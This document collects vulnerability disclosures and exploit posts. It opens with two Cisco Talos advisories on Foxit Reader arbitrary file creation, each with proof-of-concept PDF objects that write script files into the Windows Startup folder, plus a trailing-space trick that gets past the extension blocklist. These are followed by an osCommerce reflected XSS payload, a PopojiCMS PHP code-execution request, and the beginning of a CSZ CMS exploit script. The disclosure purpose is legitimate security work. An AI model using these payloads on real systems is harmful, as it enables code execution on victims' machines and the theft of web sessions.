An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to mistreatment of whitespace characters. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

**SUMMARY**

An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to mistreatment of whitespace characters. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 12.1.3.15356

**PRODUCT URLS**

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

**CVSSv3 SCORE**

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-73 - External Control of File Name or Path

**DETAILS**

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists an arbitrary file creation vulnerability in the way Foxit Reader handles the exportDataObject method of the Doc object. The exportDataObject method extracts the data object specified via the cName parameter to an external file. This method can launch the file once it is created if the nLaunch parameter of the method is set to 2. This can be illustrated by the following proof-of-concept code:

    5 0 obj
    <</S/JavaScript/JS(\n\nfunction main {
    this.exportDataObject${ cName:"MyData", nLaunch: 2}$;
    
    }
    main;
    )/Type/Action>>
    endobj
    
    6 0 obj
    <</Length 6/Params<</ModDate(D:20230731134730-08'00')/Size 6/CheckSum<FA0903293EC8FC1F19087D0EB2FFDED8>/CreationDate(D:20230731133537-08'00')>>/Subtype/application#2Fhta/Type/EmbeddedFile>>
    stream
    <job>
      <script language="VBScript">
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c calc.exe"
      </script>
    </job>
    endstream
    endobj
    
    7 0 obj
    <</UF(..\/..\/..\/..\/..\/AppData\/Roaming\/Microsoft\/Windows\/Start Menu\/Programs\/Startup\/exploit.wsf )/EF<</F 6 0 R>>/Desc()/F(exploit.wsf)/Type/Filespec>>
    endobj
    
    8 0 obj
    <</EmbeddedFiles 9 0 R>>
    endobj
    
    9 0 obj
    <</Names[<FEFF004D00790044006100740061>7 0 R]>>
    endobj
    

Here, the object 9 contains the MyData data object. FEFF004D00790044006100740061 is the hexadecimal unicode value of the string MyData. The exportDataObject method extracts this data object and writes it to the file indicated by the UF key of the object 7. In this case, a WSF file is written to the disk. The content of the file is the stream object of the object 6, which contains the VBScript code to run the calc.exe application.

The Foxit application saves the new file to the temp directory, but it doesn’t check for the directory traversal characters, i.e. dot-dot-slash (“../”), before appending the filename indicated by the UF key to the temporary directory path. This allows the use of the directory traversal vulnerability to write files to an arbitrary path.

The application checks the extension of a file against the blocklist filter of 93 known file extensions before calling a method responsible for creating it. The blocklisted extensions are as follows:

    .text:017E47CD mov     [ebp+var_19C], offset aAcm ; "acm"
    .text:017E47D7 mov     [ebp+var_198], offset aAde ; "ade"
    .text:017E47E1 mov     [ebp+var_194], offset aAdp ; "adp"
    .text:017E47EB mov     [ebp+var_190], offset aApp ; "app"
    .text:017E47F5 mov     [ebp+var_18C], offset aAsa ; "asa"
    .text:017E47FF mov     [ebp+var_188], offset aAsp ; "asp"
    .text:017E4809 mov     [ebp+var_184], offset aAspx ; "aspx"
    .text:017E4813 mov     [ebp+var_180], offset aAx ; "ax"
    .text:017E481D mov     [ebp+var_17C], offset aBas ; "bas"
    .text:017E4827 mov     [ebp+var_178], offset aBat ; "bat"
    .text:017E4831 mov     [ebp+var_174], offset aBin ; "bin"
    .text:017E483B mov     [ebp+var_170], offset aCer ; "cer"
    .text:017E4845 mov     [ebp+var_16C], offset aChm_0 ; "chm"
    .text:017E484F mov     [ebp+var_168], offset aClb ; "clb"
    .text:017E4859 mov     [ebp+var_164], offset aCmd ; "cmd"
    .text:017E4863 mov     [ebp+var_160], offset aCnt ; "cnt"
    .text:017E486D mov     [ebp+var_15C], offset aCnv ; "cnv"
    .text:017E4877 mov     [ebp+var_158], offset aCom ; "com"
    .text:017E4881 mov     [ebp+var_154], offset aCpl ; "cpl"
    .text:017E488B mov     [ebp+var_150], offset aCpx ; "cpx"
    .text:017E4895 mov     [ebp+var_14C], offset aCrt ; "crt"
    .text:017E489F mov     [ebp+var_148], offset aCsh ; "csh"
    .text:017E48A9 mov     [ebp+var_144], offset Ext ; "dll"
    .text:017E48B3 mov     [ebp+var_140], offset aDrv ; "drv"
    .text:017E48BD mov     [ebp+var_13C], offset aDtd ; "dtd"
    .text:017E48C7 mov     [ebp+var_138], offset aExe_0 ; "exe"
    .text:017E48D1 mov     [ebp+var_134], offset aFxp ; "fxp"
    .text:017E48DB mov     [ebp+var_130], offset aGrp ; "grp"
    .text:017E48E5 mov     [ebp+var_12C], offset aH1s ; "h1s"
    .text:017E48EF mov     [ebp+var_128], offset aHlp ; "hlp"
    .text:017E48F9 mov     [ebp+var_124], offset aHta ; "hta "
    .text:017E4903 mov     [ebp+var_120], offset aIme ; "ime"
    .text:017E490D mov     [ebp+var_11C], offset aInf_0 ; "inf"
    .text:017E4917 mov     [ebp+var_118], offset aIns ; "ins"
    .text:017E4921 mov     [ebp+var_114], offset aIsp ; "isp"
    .text:017E492B mov     [ebp+var_110], offset aIts ; "its"
    .text:017E4935 mov     [ebp+var_10C], offset aJs_3 ; "js"
    .text:017E493F mov     [ebp+var_108], offset aJse ; "jse"
    .text:017E4949 mov     [ebp+var_104], offset aKsh ; "ksh"
    .text:017E4953 mov     [ebp+var_100], offset aLnk_0 ; "lnk"
    .text:017E495D mov     [ebp+var_FC], offset aMad ; "mad"
    .text:017E4967 mov     [ebp+var_F8], offset aMaf ; "maf"
    .text:017E4971 mov     [ebp+var_F4], offset aMag ; "mag"
    .text:017E497B mov     [ebp+var_F0], offset aMam ; "mam"
    .text:017E4985 mov     [ebp+var_EC], offset aMan ; "man"
    .text:017E498F mov     [ebp+var_E8], offset aMaq ; "maq"
    .text:017E4999 mov     [ebp+var_E4], offset aMar_0 ; "mar"
    .text:017E49A3 mov     [ebp+var_E0], offset aMas ; "mas"
    .text:017E49AD mov     [ebp+var_DC], offset aMat ; "mat"
    .text:017E49B7 mov     [ebp+var_D8], offset aMau ; "mau"
    .text:017E49C1 mov     [ebp+var_D4], offset aMav ; "mav"
    .text:017E49CB mov     [ebp+var_D0], offset aMaw ; "maw"
    .text:017E49D5 mov     [ebp+var_CC], offset aMda ; "mda"
    .text:017E49DF mov     [ebp+var_C8], offset aMdb ; "mdb"
    .text:017E49E9 mov     [ebp+var_C4], offset aMde ; "mde"
    .text:017E49F3 mov     [ebp+var_C0], offset aMdt ; "mdt"
    .text:017E49FD mov     [ebp+var_BC], offset aMdw ; "mdw"
    .text:017E4A07 mov     [ebp+var_B8], offset aMdz ; "mdz"
    .text:017E4A11 mov     [ebp+var_B4], offset aMsc ; "msc"
    .text:017E4A1B mov     [ebp+var_B0], offset aMsi ; "msi"
    .text:017E4A25 mov     [ebp+var_AC], offset aMsp ; "msp"
    .text:017E4A2F mov     [ebp+var_A8], offset aMst ; "mst"
    .text:017E4A39 mov     [ebp+var_A4], offset aMui ; "mui"
    .text:017E4A43 mov     [ebp+var_A0], offset aNls ; "nls"
    .text:017E4A4D mov     [ebp+var_9C], offset aOcx ; "ocx"
    .text:017E4A57 mov     [ebp+var_98], offset aOps ; "ops"
    .text:017E4A61 mov     [ebp+var_94], offset aPal ; "pal"
    .text:017E4A6B mov     [ebp+var_90], offset aPcd ; "pcd"
    .text:017E4A75 mov     [ebp+var_8C], offset aPif ; "pif"
    .text:017E4A7F mov     [ebp+var_88], offset aPrf ; "prf"
    .text:017E4A89 mov     [ebp+var_84], offset aPrg ; "prg"
    .text:017E4A93 mov     [ebp+var_80], offset aPst ; "pst"
    .text:017E4A9A mov     [ebp+var_7C], offset aReg_0 ; "reg"
    .text:017E4AA1 mov     [ebp+var_78], offset aScf ; "scf"
    .text:017E4AA8 lea     ecx, [ebp+var_1A4]
    .text:017E4AAE mov     [ebp+var_74], offset aScr ; "scr"
    .text:017E4AB5 mov     [ebp+var_70], offset aSct ; "sct"
    .text:017E4ABC mov     [ebp+var_6C], offset aShb ; "shb"
    .text:017E4AC3 mov     [ebp+var_68], offset aShs ; "shs"
    .text:017E4ACA mov     [ebp+var_64], offset aSys ; "sys"
    .text:017E4AD1 mov     [ebp+var_60], offset aTlb ; "tlb"
    .text:017E4AD8 mov     [ebp+var_5C], offset aTsp ; "tsp"
    .text:017E4ADF mov     [ebp+var_58], offset aUrl ; "url"
    .text:017E4AE6 mov     [ebp+var_54], offset aVb ; "vb"
    .text:017E4AED mov     [ebp+var_50], offset aVbe ; "vbe"
    .text:017E4AF4 mov     [ebp+var_4C], offset aVbs ; "vbs"
    .text:017E4AFB mov     [ebp+var_48], offset aVsmacros ; "vsmacros"
    .text:017E4B02 mov     [ebp+var_44], offset aVss ; "vss"
    .text:017E4B09 mov     [ebp+var_40], offset aVst ; "vst"
    .text:017E4B10 mov     [ebp+var_3C], offset aVsw ; "vsw"
    .text:017E4B17 mov     [ebp+var_38], offset aWs ; "ws"
    .text:017E4B1E mov     [ebp+var_34], offset aWsc ; "wsc"
    .text:017E4B25 mov     [ebp+var_30], offset aWsf ; "wsf"
    .text:017E4B2C mov     [ebp+var_2C], offset aWsh ; "wsh"
    .text:017E4B33 mov     [ebp+var_28], offset aXsl ; "xsl"
    

This check can be bypassed by adding a space at the end of the file. For example, “exploit.acm” will be blocked but the filename “exploit.acm “ will bypass the above checks and a file with the name exploit.acm will be created. We can observe the following in the debugger (here, the value of the UF key was (exploit.acm )):

    eax=0f8ec098 ebx=0e70e6e8 ecx=073fdb5c edx=0000005e esi=00000000 edi=0b04c54c
    eip=017e4ba5 esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad755:
    017e4ba5 6666660f1f840000000000 nop word ptr [eax+eax]
    0:000> pc
    eax=0f8ec098 ebx=0e70e6e8 ecx=073fdb3c edx=0000005e esi=00000000 edi=0b04c54c
    eip=017e4bb7 esp=073fdb30 ebp=073fdd04 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad767:
    017e4bb7 e824746d00      call    FoxitPDFReader!safe_vsnprintf+0x52e880 (01ebbfe0)
    0:000> p
    eax=0b4764e8 ebx=0e70e6e8 ecx=073fdb3c edx=00000000 esi=00000000 edi=0b04c54c
    eip=017e4bbc esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad76c:
    017e4bbc 50              push    eax                                      ; <--------------------- [1]
    0:000> dd eax
    0b4764e8  0f8ddf50 0f8dd9b0 0f8ddf68 0f8dde60
    0b4764f8  0f8ddea8 0f8dd878 0f8ddad0 0f8dd9e0
    0b476508  0f8dd998 0f8dd9f8 0f8dd860 0f8dda10
    0b476518  0f8dda70 0f8dd8d8 0f8dd9c8 0f8dda28
    0b476528  0f8dda58 0f8dd968 0f8dd908 0f8dd830
    0b476538  0f8dd650 0f8dd938 0f8dda40 0f8dd890
    0b476548  0f8dd8f0 0f8dd8a8 0f8dd920 0f8dd698
    0b476558  0f8dd8c0 0f8dd980 0f8dd848 0f8dd950
    0:000> du 0f8ddf50+c                                             
    0f8ddf5c  "acm"
    0:000> du 0f8dd9b0+c
    0f8dd9bc  "ade"
    0:000> du 0f8ddf68+c
    0f8ddf74  "adp"
    0:000> p
    eax=0b4764e8 ebx=0e70e6e8 ecx=073fdb3c edx=00000000 esi=00000000 edi=0b04c54c
    eip=017e4bbd esp=073fdb30 ebp=073fdd04 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad76d:
    017e4bbd 8d8d5cfeffff    lea     ecx,[ebp-1A4h]
    0:000> p
    eax=0b4764e8 ebx=0e70e6e8 ecx=073fdb60 edx=00000000 esi=00000000 edi=0b04c54c
    eip=017e4bc3 esp=073fdb30 ebp=073fdd04 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad773:
    017e4bc3 e8382f6d00      call    FoxitPDFReader!safe_vsnprintf+0x52a3a0 (01eb7b00) ; <--------------------- [2]
    0:000> dd ecx                                            
    073fdb60  0f8dde18 0fe92208 04a13aec 04a13af4
    073fdb70  04a13afc 04a13b04 04a13b0c 04a13b14
    073fdb80  04a13b1c 04a13b28 04a13b30 04a13b38
    073fdb90  04a13b40 04a13b48 04a13b50 04a13b58
    073fdba0  04a13b60 04a13b68 04a13b70 04a13b78
    073fdbb0  04a13b80 04a13b88 04a13b90 04a13b98
    073fdbc0  049918bc 04a13ba0 04a13ba8 049d1d20
    073fdbd0  04a13bb0 04a13bb8 04a13bc0 04a13bc8
    0:000> du 0f8dde18+c                                        ; <--------------------- [3]
    0f8dde24  "acm "                                          
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=00000003 edx=0000006d esi=00000000 edi=0b04c54c
    eip=017e4bc8 esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad778:
    017e4bc8 85c0            test    eax,eax                  ; <--------------------- [4]
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=00000003 edx=0000006d esi=00000000 edi=0b04c54c
    eip=017e4bca esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad77a:
    017e4bca 745a            je      FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad7d6 (017e4c26) [br=0]
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=00000003 edx=0000006d esi=00000000 edi=0b04c54c
    eip=017e4bcc esp=073fdb34 ebp=073fdd04 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3ad77c:
    017e4bcc 46              inc     esi
    0:000> g
    Breakpoint 6 hit
    eax=0b46e80c ebx=0e70e6e8 ecx=1f2842b4 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3014 esp=073fb704 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbc4:
    017e3014 8d8dc4d7ffff    lea     ecx,[ebp-283Ch]
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e301a esp=073fb704 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbca:
    017e301a 51              push    ecx
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e301b esp=073fb700 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbcb:
    017e301b 6801100000      push    1001h
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3020 esp=073fb6fc ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbd0:
    017e3020 50              push    eax
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb714 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3021 esp=073fb6f8 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbd1:
    017e3021 8d8dd8d7ffff    lea     ecx,[ebp-2828h]
    0:000> du eax                                                              ; <--------------------- [5]
    0b46e80c  "C:\Users\dev\AppData\Local\Temp\"
    0b46e84c  "$frd_\F9R4B52.tmp\exploit.acm "
    0:000> p
    eax=0b46e80c ebx=0e70e6e8 ecx=073fb728 edx=00000000 esi=073fdfb8 edi=00000000
    eip=017e3027 esp=073fb6f8 ebp=073fdf50 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbd7:
    017e3027 e8f2b38302      call    FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1dcaee (0401e41e)  ; <--------------------- [6]
    0:000> p
    eax=00000001 ebx=0e70e6e8 ecx=1817f444 edx=00000006 esi=073fdfb8 edi=00000000
    eip=017e302c esp=073fb704 ebp=073fdf50 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x3abbdc:
    017e302c 85c0            test    eax,eax                              ; <--------------------- [7]
    

At [1], the argument of the method at [2] is pushed onto the stack. The value being pushed comes from the register eax, which contains the disallowed file extensions. At [3], the this object of the method contains the extension of the given filename, which is the string “acm “. The method called at [2] performs the string comparison, which fails as the string “acm “ is not present in the disallowed list. The comparison results can be observed at [4]. Later on, the filename was passed to CFile::Open at [6], which created the file successfully. The non-zero value at [7] indicates that the open was successful.

This vulnerability allows the creation of arbitrary files, and the execution of these files leads to arbitrary code execution.

**TIMELINE**

2023-08-28 - Vendor Disclosure  
2023-11-22 - Vendor Patch Release  
2023-11-27 - Public Release

Discovered by Kamlapati Choubey of Cisco Talos.

CVE-2023-40194: TALOS-2023-1833 || Cisco Talos Intelligence Group

A code execution vulnerability exists in the Javascript saveAs API of Foxit Reader 12.1.3.15356. A specially crafted malformed file can create arbitrary files, which can lead to remote code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

**SUMMARY**

A code execution vulnerability exists in the Javascript saveAs API of Foxit Reader 12.1.3.15356. A specially crafted malformed file can create arbitrary files, which can lead to remote code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 12.1.3.15356

**PRODUCT URLS**

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

**CVSSv3 SCORE**

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-73 - External Control of File Name or Path

**DETAILS**

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists an arbitrary file creation vulnerability in the way Foxit Reader handles the saveAs method of the Doc object. The saveAs method saves the file to the device-independent path specified by the cPath parameter. The vulnerability occurs when a file is created without validating its path and type. This allows the creation of files of dangerous types such as HTA. Subsequent execution of such files can lead to arbitrary code execution. This can be illustrated by the following proof-of-concept code:

    5 0 obj
    <</Type/Action/S/JavaScript/JS(
    
    function main() {
    this.saveAs("/c/users/" + identity.loginName + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/exploit.hta");
    }
    main();
    
    )>>
    endobj
    
    6 0 obj
    <</Length 6/Params<</ModDate(D:20230731134730-08'00')/Size 6/CheckSum<FA0903293EC8FC1F19087D0EB2FFDED8>/CreationDate(D:20230731133537-08'00')>>/Filter/FlateDecode/Subtype/application#2Fhta/Type/EmbeddedFile>>
    stream
    <script language='jscript'>var cmd = 'cmd.exe /c calc.exe'; new ActiveXObject('WScript.Shell').Run(cmd);</script>
    endstream
    endobj
    

Here, the saveAs method creates an HTA file in the Startup folder. Files in the Startup folder execute automatically on system startup. The content of the new file is data of the above poc PDF file. The Foxit application encodes the objects before writing them to the new file. This encoding transforms the attacker-controlled suspicious code into the encoded stream, which may not be a valid suspicious code. Execution of transformed code may not be possible unless it is decoded first.

One way to bypass this is to simply provide an encoded object with a stream object containing a valid suspicious code. For example, the object 6 contains the Filter key, with a value that indicates how the stream object is encoded. This tricks the Foxit application into writing the object 6 directly into the new file without performing any type of encoding on the object. The stream object contains JavaScript to run the calc.exe application, so on the execution of the HTA file a calc.exe application will pop up. We can observe the creation of an HTA file in the debugger:

    0:000> g
    Breakpoint 1 hit
    eax=00000000 ebx=18b335a8 ecx=00000000 edx=07500000 esi=0b07ff58 edi=00000000
    eip=0094e893 esp=073fd398 ebp=073fe004 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x4bd83:
    0094e893 6a00            push    0
    0:000> p
    eax=00000000 ebx=18b335a8 ecx=00000000 edx=07500000 esi=0b07ff58 edi=00000000
    eip=0094e895 esp=073fd394 ebp=073fe004 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x4bd85:
    0094e895 6a02            push    2
    0:000> p
    eax=00000000 ebx=18b335a8 ecx=00000000 edx=07500000 esi=0b07ff58 edi=00000000
    eip=0094e897 esp=073fd390 ebp=073fe004 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x4bd87:
    0094e897 ff7508          push    dword ptr [ebp+8]    ss:0023:073fe00c=0b07ff58 ;<----------- [1]
    0:000> dd 0b07ff58
    0b07ff58  003a0063 0075005c 00650073 00730072
    0b07ff68  0064005c 00760065 0041005c 00700070
    0b07ff78  00610044 00610074 0052005c 0061006f
    0b07ff88  0069006d 0067006e 004d005c 00630069
    0b07ff98  006f0072 006f0073 00740066 0057005c
    0b07ffa8  006e0069 006f0064 00730077 0053005c
    0b07ffb8  00610074 00740072 004d0020 006e0065
    0b07ffc8  005c0075 00720050 0067006f 00610072
    0:000> du 0b07ff58                                     ;<--------------------------------------- [2]
    0b07ff58  "c:\users\dev\AppData\Roaming\Mic"
    0b07ff98  "rosoft\Windows\Start Menu\Progra"
    0b07ffd8  "ms\Startup\exploit.hta"
    0:000> p
    eax=00000000 ebx=18b335a8 ecx=00000000 edx=07500000 esi=0b07ff58 edi=00000000
    eip=0094e89a esp=073fd38c ebp=073fe004 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x4bd8a:
    0094e89a e821065701      call    FoxitPDFReader!safe_vsnprintf+0x531760 (01ebeec0) ;<----------- [3]
    0:000> p
    eax=0ae29460 ebx=18b335a8 ecx=ffffffff edx=07500000 esi=0b07ff58 edi=00000000
    eip=0094e89f esp=073fd38c ebp=073fe004 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x4bd8f:
    0094e89f 83c40c          add     esp,0Ch
    

At [1], the first argument of the method at [3] is pushed onto the stack. The value being pushed comes from the stack, and its value can be observed at [2]. The HTA file is passed to the method, and the execution of the method successfully creates the HTA file.

**TIMELINE**

2023-08-28 - Vendor Disclosure  
2023-09-12 - Vendor Patch Release  
2023-11-27 - Public Release

Discovered by Kamlapati Choubey of Cisco Talos.

CVE-2023-39542: TALOS-2023-1832 || Cisco Talos Intelligence Group

osCommerce version 4 suffers from a cross site scripting vulnerability.

    # Exploit Title: osCommerce 4 - Reflected XSS# Exploit Author: CraCkEr# Date: 13/11/2023# Vendor: osCommerce ltd.# Vendor Homepage: https://www.oscommerce.com/# Software Link: https://demo.oscommerce.com/# Demo Link: https://demo.oscommerce.com/printshop/# Tested on: Windows 11 Home# Impact: Manipulate the content of the site# CWE: CWE-79 - CWE-74 - CWE-707# CVE: CVE-2023-6296## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionAttacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /catalog/compareGET parameter 'compare[]' is vulnerable to XSShttps://website/catalog/compare?compare[]=40dz4iq"><script>alert(1)</script>zohkx[-] Done

osCommerce 4 Cross Site Scripting

PopojiCMS version 2.0.1 suffers from a remote command execution vulnerability.

    # Exploit Title: PopojiCMS Version : 2.0.1  Remote Command Execution# Date: 27/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.popojicms.org/# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip# Version: Version : 2.0.1# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS##POC:1 ) Login with admin cred and click settings2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>3 ) Open main page , you will be see id command result POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1Host: demos5.softaculous.comCookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7DUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=settingContent-Type: application/x-www-form-urlencodedContent-Length: 58Origin: https://demos5.softaculous.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closemeta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3EResult: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

PopojiCMS 2.0.1 Remote Command Execution

CSZ CMS version 1.3.0 suffers from a remote command execution vulnerability. Exploit written in Python.

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution  
# Date: 17/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://www.cszcms.com/  
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download  
# Version: Version 1.3.0  
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

import os  
import zipfile  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
from selenium.webdriver.firefox.options import Options as FirefoxOptions  
from selenium.webdriver.firefox.service import Service as FirefoxService  
from webdriver_manager.firefox import GeckoDriverManager  
from selenium.webdriver.support.ui import WebDriverWait  
from selenium.webdriver.support import expected_conditions as EC  
